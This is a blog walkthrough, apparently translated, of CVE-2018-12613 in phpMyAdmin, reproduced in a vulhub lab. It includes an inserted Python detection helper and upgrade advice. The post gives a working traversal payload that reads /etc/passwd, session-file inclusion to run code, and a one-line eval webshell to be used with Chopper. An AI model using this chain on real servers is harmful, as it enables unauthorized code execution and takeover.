CVE-2018-12613 phpMyAdmin file inclusion vulnerability analysis and exploitation


Vulnerability description

  An issue was discovered in phpMyAdmin 4.8.x before 4.8.2 in which an attacker can include (view and possibly execute) files on the server. The vulnerability comes from the code where pages are redirected and loaded within phpMyAdmin, together with an incorrect test for whitelisted pages. The attacker must be authenticated, except in the "$cfg['AllowArbitraryServer'] = true" case (where the attacker can specify any host he/she already controls and execute arbitrary code on phpMyAdmin) and the "$cfg['ServerDefault'] = 0" case (which bypasses the login requirement and runs the vulnerable code without any authentication).

Affected versions


phpMyAdmin 4.8.0 and 4.8.1


Vulnerability environment construction


Use vulhub to start the CVE-2018-12613 environment directly with Docker in one step

Docker quick start and vulnerability environment construction

After downloading and installing vulhub, enter the /phpmyadmin/CVE-2018-12613 directory and execute the following command to start the environment

sudo docker-compose up -d

Check the current virtual machine IP and visit port 8080; the phpMyAdmin page appears


Vulnerability analysis


Look at index.php at line 61: there is an include statement guarded by the following conditions


  1. Determine whether target exists
  2. Determine whether target is a string
  3. target must not start with the string "index"
  4. target must not be in the $target_blacklist array
  5. target is passed to the checkPageValidity method of the Core class

The $target_blacklist array contains the following two file names:


View the libraries/classes/Core.php file at line 443 and analyse how the checkPageValidity method is used:

At line 25 you can see which values are stored in the $whitelist array:


Go back to the checkPageValidity method; the important part is the following code:

$_page = mb_substr(
    $page,
    0,
    mb_strpos($page . '?', '?')
);
if (in_array($_page, $whitelist)) {
    return true;
}

This code takes the target variable, cuts it off at the first "?" (keeping only the characters before it), and matches that prefix against the $whitelist array. If the match succeeds, the method returns true, so anything after the "?" is never checked.
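As an added illustration (not code from the post or from phpMyAdmin), the check above rebuilt in Python beside an exact-match variant and a small log-triage helper. The whitelist subset and function names are mine, and the exact-match approach reflects my understanding of how the 4.8.2 fix treats pages used for include (an assumption, not a quote of the upstream code).

```python
from urllib.parse import unquote

# Constructed subset of phpMyAdmin's goto whitelist (the real list is longer).
WHITELIST = ["db_sql.php", "index.php", "sql.php", "tbl_sql.php"]


def page_before_query(page: str) -> str:
    """Python equivalent of mb_substr($page, 0, mb_strpos($page . '?', '?'))."""
    return page[: (page + "?").index("?")]


def weak_check(page: str, whitelist=WHITELIST) -> bool:
    """The vulnerable logic: whatever follows the first '?' is ignored,
    so 'sql.php?/../x' is accepted because 'sql.php' is whitelisted."""
    return page_before_query(page) in whitelist


def exact_check(page: str, whitelist=WHITELIST) -> bool:
    """Hardened check for a value that will be passed to include:
    only an exact whitelist entry passes, a '?' suffix never does."""
    return page in whitelist


def is_traversal_target(raw_target: str) -> bool:
    """Triage helper for access logs: a whitelisted page name, a '?', and a
    '..' path segment after it is this bypass, never a legitimate goto value.
    The value is URL-decoded once so '%3F' and '?' are treated alike."""
    target = unquote(raw_target)
    head, sep, tail = target.partition("?")
    return bool(sep) and head in WHITELIST and ".." in tail.split("/")


if __name__ == "__main__":
    # Constructed sample targets; the second is the payload shape from the page.
    for t in ["sql.php", "sql.php?/../../../../../../../../../etc/passwd"]:
        print(f"{t!r}: weak={weak_check(t)} exact={exact_check(t)} "
              f"flag={is_traversal_target(t)}")
```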

Construct the payload:

?target=sql.php?/../../../../../../../../../etc/passwd

The passwd file is successfully included.

Exploit


The docker environment built by vulhub cannot be used for the approach of writing a Trojan into the database and then including the .frm file, because vulhub separates the web server and the database: anything we insert into a table is stored on the database system, not on the web server.
So instead we write the shell through the session file to get a shell.

Execute sql statement:

SELECT "<?php phpinfo();?>"

Checking our session shows that the PHP code we entered has in fact been saved on the server.

Enter the docker container and look at the tmp files on the web server; our session file is there.

Viewing the session file with cat shows the PHP code we just queried:

# cat <session file>
cat sess_7600504195960fdd23197b847708a866

We use the payload to include the session file, and phpinfo appears.

/index.php?target=sql.php?/../../../../../../../../../tmp/sess_7600504195960fdd23197b847708a866

Search the phpinfo output for CONTEXT_DOCUMENT_ROOT to find the web root path


Write the webshell:

select "<?php file_put_contents('/var/www/html/cmd.php','<?php @eval($_POST[pass]);?>')?>"


Then include the session file again

/index.php?target=sql.php?/../../../../../../../../../tmp/sess_3ac44a735bf3546cbbb3aabb00da9322


Visiting cmd.php shows that the file exists, so the write succeeded.


Add the Trojan's address and password to Chopper



Vulnerability hardening


Upgrade to the latest version of phpMyAdmin (the issue is fixed in 4.8.2); this does not affect business operation.


Source: blog.csdn.net/weixin_41924764/article/details/109701126